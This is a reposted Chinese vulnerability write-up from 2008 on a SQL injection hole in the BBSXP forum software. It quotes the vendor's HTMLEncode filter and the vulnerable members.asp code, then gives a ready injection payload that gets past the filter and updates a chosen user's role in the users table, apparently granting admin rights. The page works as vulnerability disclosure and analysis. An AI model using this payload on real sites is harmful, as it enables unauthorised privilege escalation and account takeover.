当前位置: 代码网 > 服务器>网络安全>漏洞分析 > BBSXP绕过过滤继续注入漏洞分析

BBSXP绕过过滤继续注入漏洞分析

2008年10月08日 漏洞分析 我要评论
BBSXP绕过过滤继续注入漏洞分析 漏洞分析:官方最新过滤函数HTMLEncode,这次过滤了字符* ,再一次绕过过滤注射Function HTMLEncode(fString)fString=Replace(fString,CHR(9),"")fString=Replac... 08-10-08
漏洞分析:
官方最新过滤函数htmlencode,这次过滤了字符* ,再一次绕过过滤注射
function htmlencode(fstring)
fstring=replace(fstring,chr(9),"")
fstring=replace(fstring,chr(13),"")
fstring=replace(fstring,chr(22),"")
fstring=replace(fstring,chr(38),"&") '“&”
fstring=replace(fstring,chr(32)," ") '“ ”
fstring=replace(fstring,chr(34),""") '“"”
fstring=replace(fstring,chr(39),"'") '“'”
fstring=replace(fstring,chr(42),"*") '“*”
fstring=replace(fstring,chr(44),",") '“,”
fstring=replace(fstring,chr(45)&chr(45),"--") '“--”
fstring=replace(fstring,chr(60),"<") '“<”
fstring=replace(fstring,chr(62),">") '“>”
fstring=replace(fstring,chr(92),"\") '“\”
fstring=replace(fstring,chr(59),";") '“;”
fstring=replace(fstring,chr(10),"<br>")
fstring=replacetext(fstring,"([&#])([a-z0-9]*);","$1$2;")
if siteconfig("bannedtext")<>"" then fstring=replacetext(fstring,"("&siteconfig("bannedtext")&")",string(len("&$1&"),"*"))
if issqldatabase=0 then '过滤片假名(日文字符)[\u30a0-\u30ff] by yuzi
fstring=escape(fstring)
fstring=replacetext(fstring,"%u30([a-f][0-f])","0$1;")
fstring=unescape(fstring)
end if
htmlencode=fstring
end function
members.asp漏洞文件作为测试:
searchtype=htmlencode(request("searchtype")) //第8行
searchtext=htmlencode(request("searchtext"))
searchrole=requestint("searchrole")
currentaccountstatus=htmlencode(request("currentaccountstatus"))
......
if searchtext<>"" then item=item&" and ("&searchtype&" like '%"&searchtext&"%')" //第18行
......
if currentaccountstatus <> "" then item=item&" and useraccountstatus="¤taccountstatus&"" //第22行

if item<>"" then item=" where "&mid(item,5)
......
totalcount=execute("select count(userid) from ["&tableprefix&"users]"&item)(0) '获取数据数量
//第54行

看个sql语句:
select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006c003600330036003400)
变量userid绕过过滤成功执行了update
同理构造:
searchtype=1
searchtext=1
currentaccountstatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006c003600330036003400)
(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com